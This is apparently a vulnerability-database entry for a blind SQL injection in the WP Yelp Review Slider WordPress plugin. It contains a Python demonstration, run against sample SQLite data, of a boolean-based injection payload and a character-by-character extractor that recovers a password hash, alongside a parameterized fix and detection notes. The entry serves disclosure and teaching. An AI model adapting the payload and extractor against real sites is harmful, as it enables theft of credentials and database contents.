CVE-2025-26946
Description
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in jgwhite33 WP Yelp Review Slider wp-yelp-review-slider allows Blind SQL Injection. This issue affects WP Yelp Review Slider: from n/a through <= 8.1.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Blind SQL injection in the WP Yelp Review Slider WordPress plugin (versions 8.1 and earlier) lets unauthenticated attackers infer database contents one query at a time.
Vulnerability Overview
CVE-2025-26946 describes a blind SQL injection vulnerability in the WP Yelp Review Slider plugin for WordPress, versions 8.1 and earlier. The root cause is improper neutralization of special elements used in an SQL command: user-controlled input reaches a database query without being escaped or bound as a parameter, so an attacker can alter the query's logic [1].
Attack Vector
The vulnerability is exploitable without authentication, so any remote client that can reach the site can attempt it [1]. The public description does not identify the injectable parameter; it only states that the plugin's input handling allows blind SQL injection. "Blind" means the query's output is never shown to the attacker directly: each crafted request injects a condition, and the attacker learns one bit per request from whether the response changes (boolean-based) or is delayed, for example via MySQL's SLEEP() (time-based). Repeating this per character is slow but sufficient to read arbitrary values out of the database.
Impact
Successful exploitation allows an attacker to read from the underlying WordPress database, including sensitive data such as password hashes from the users table, stored session tokens, and other site content. The CVSS v3.1 base score of 7.6 (High) reflects the high confidentiality impact and the ease of remote exploitation without privileges [1].
Mitigation
The plugin vendor has released version 8.2, which addresses the vulnerability [1]. The standard fix for this class of bug in WordPress plugins is to pass every user-controlled value through $wpdb->prepare() placeholders rather than escaping or concatenating it into the query string. Users are strongly advised to update immediately. Patchstack subscribers can enable auto-updates for vulnerable plugins. If an update is not possible, site administrators should consult their hosting provider for alternative protective measures such as request filtering, though patching is the definitive solution [1].
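The following is an added example and is not code from the WP Yelp Review Slider plugin or from the vendor's fix. It uses an in-memory SQLite database with constructed sample rows (a minimal stand-in for WordPress's users table and a hypothetical reviews table) to show both halves of the story above: how a boolean-based blind injection recovers a value the page never displays, and how binding the same input as a parameter neutralises the payload. The handler names and the slider_id parameter are assumptions for illustration only.

```python
import sqlite3

# Added illustration, not the plugin's code. Hypothetical handlers
# reviews_vulnerable / reviews_hardened and the slider_id parameter
# are assumptions; the tables and rows are constructed sample data.


def make_db():
    """Constructed sample schema loosely modelled on WordPress tables."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT)")
    db.execute("INSERT INTO wp_users VALUES (1, 'admin', '$P$Bnotarealhash')")
    db.execute("CREATE TABLE reviews (id INTEGER, slider_id TEXT, body TEXT)")
    db.executemany("INSERT INTO reviews VALUES (?, ?, ?)",
                   [(1, "42", "Great food"), (2, "43", "Slow service")])
    return db


def reviews_vulnerable(db, slider_id):
    """Hypothetical vulnerable handler: untrusted input concatenated into SQL."""
    sql = f"SELECT body FROM reviews WHERE slider_id = '{slider_id}'"
    return [row[0] for row in db.execute(sql)]


def reviews_hardened(db, slider_id):
    """Same query with a bound parameter; the value is never parsed as SQL.
    The WordPress equivalent is $wpdb->prepare() with a %s placeholder."""
    sql = "SELECT body FROM reviews WHERE slider_id = ?"
    return [row[0] for row in db.execute(sql, (slider_id,))]


def oracle(db, condition):
    """Boolean-based blind oracle: review 42 is returned only when `condition`
    is true, so the attacker learns one bit per request without seeing data."""
    payload = f"42' AND ({condition}) -- "
    return len(reviews_vulnerable(db, payload)) > 0


def extract_scalar(db, subquery, max_len=64):
    """Recover the string returned by `subquery` one character at a time,
    binary-searching each code point so the payload needs no quote characters."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(db, f"length(({subquery})) >= {pos}"):
            break
        lo, hi = 32, 126  # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(db, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def demo():
    """Extract a login and password hash through the oracle, then show the
    hardened handler treating the same injection as a literal slider id."""
    db = make_db()
    stolen_user = extract_scalar(db, "SELECT user_login FROM wp_users WHERE ID = 1")
    stolen_hash = extract_scalar(db, "SELECT user_pass FROM wp_users WHERE ID = 1")
    safe = reviews_hardened(db, "42' AND (1=1) -- ")
    return stolen_user, stolen_hash, safe


if __name__ == "__main__":
    user, pw_hash, safe = demo()
    print("extracted via blind oracle:", user, pw_hash)
    print("hardened handler returned:", safe)
```

Each character costs about seven requests with the binary search, which is why blind injection is noisy in web server logs: a burst of near-identical requests differing only in a numeric comparison is a usable detection signal. On MySQL the same oracle can be built from response timing with SLEEP() when the page shows no visible difference. The hardened handler returns an empty list for the injected input because the whole string is compared as a literal slider id, which is exactly what $wpdb->prepare() guarantees.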
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products (1)
- Range: <= 8.1
Patches (0)
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References (1)
News mentions (0)
No linked articles in our index yet.